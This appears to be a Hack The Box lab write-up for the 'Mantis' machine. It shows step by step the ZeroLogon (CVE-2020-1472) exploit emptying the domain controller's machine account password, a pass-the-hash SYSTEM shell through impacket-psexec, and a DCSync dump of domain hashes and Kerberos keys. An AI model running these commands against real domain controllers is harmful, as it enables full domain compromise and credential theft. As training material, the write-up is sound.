InfoSec LAB

Mantis_Privilege_Escalation

Created: 3 min read

CVE-2020-1472 (ZeroLogon)

the target system is confirmed to be vulnerable to cve-2020-1472, which is also called the ZeroLogon vulnerability i got the exploit script from the github repo

zerologon enables an unauthenticated attacker to remotely escalate their privileges straight to Domain Admin, with network access to a domain controller as the only requirement.

it exploits an insecure implementation of AES-CFB8 in the MS-NRPC by brute-forcing the authentication up to 256 times with a challenge and ciphertext consisting of 8 zero-bytes \x00', resulting the eventual match that leads to authentication bypass as the machine account. It then resets the password empty.

more about this vulnerability here

┌──(kali㉿kali)-[~/…/htb/labs/mantis/CVE-2020-1472]
└─$ python3 cve-2020-1472-exploit.py mantis $IP      
Performing authentication attempts...
================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
 
result: 0
 
Exploit complete!

Successfully executed the exploit. I never needed any credential. Hence the name of the exploit, ZeroLogon The machine account mantis$ now should have no password

At this point I can do anything

impacket-psexec

┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-psexec 'administrator@$IP' -target-ip $IP -no-pass -hashes 'aad3b435b51404eeaad3b435b51404ee:22140219fd9432e584a355e54b28ecbb'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file WYBKGGFI.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service wtCP on 10.10.10.52.....
[*] Starting service wtCP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
mantis
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::ec9c:ffc1:b8d8:8269
   Link-local IPv6 Address . . . . . : fe80::ec9c:ffc1:b8d8:8269%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.52
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
Tunnel adapter isatap.{F163287B-37D4-42AC-8358-59BD4FBFBE46}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

I can get my Initial Foothold as nt authority\system via impacket-psexec with the administrator’s hash

DCSync Attack

┌──(kali㉿kali)-[~/…/htb/labs/mantis/CVE-2020-1472]
└─$ impacket-secretsdump htb.local/mantis$:@mantis.htb.local -target-ip $IP -dc-ip $IP -just-dc -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:22140219fd9432e584a355e54b28ecbb:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e330665e47f7890603b5a96bbb31e23:::
htb.local\james:1103:aad3b435b51404eeaad3b435b51404ee:71b5ea0a10d569ffac56d3b63684b3d2:::
mantis$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:c06d7bb2e780b417445f0f55c52399de2dbd206a383be45d407b376356cd9170
administrator:aes128-cts-hmac-sha1-96:ea5a1c528034eac55c6e97af85773352
administrator:des-cbc-md5:c2d65b4f7abab392
krbtgt:aes256-cts-hmac-sha1-96:fb0175b25239486d1cee94e6fe7f2167017df916981c21ea0542d4460298d18e
krbtgt:aes128-cts-hmac-sha1-96:ddbab1997d4bbd7a6c591f887b739c68
krbtgt:des-cbc-md5:a113768326f10e1a
htb.local\james:aes256-cts-hmac-sha1-96:a5b5099819f72a8b932c8cf10b643fc10fa98f6ef80397c196d3977210846e56
htb.local\james:aes128-cts-hmac-sha1-96:762d8ec29ef72edb6690c52cfe6b91e3
htb.local\james:des-cbc-md5:2085528ca7b67383
mantis$:aes256-cts-hmac-sha1-96:7de75b8449af57628a8c5f128d4b94e670b6aeaeba37407590b5e0bd2fadd324
mantis$:aes128-cts-hmac-sha1-96:c3a04c3550125dee0bec73669224a0bc
mantis$:des-cbc-md5:252608c770c176cd
[*] Cleaning up...

Domain Level Compromise

Interactive Graph View

Backlinks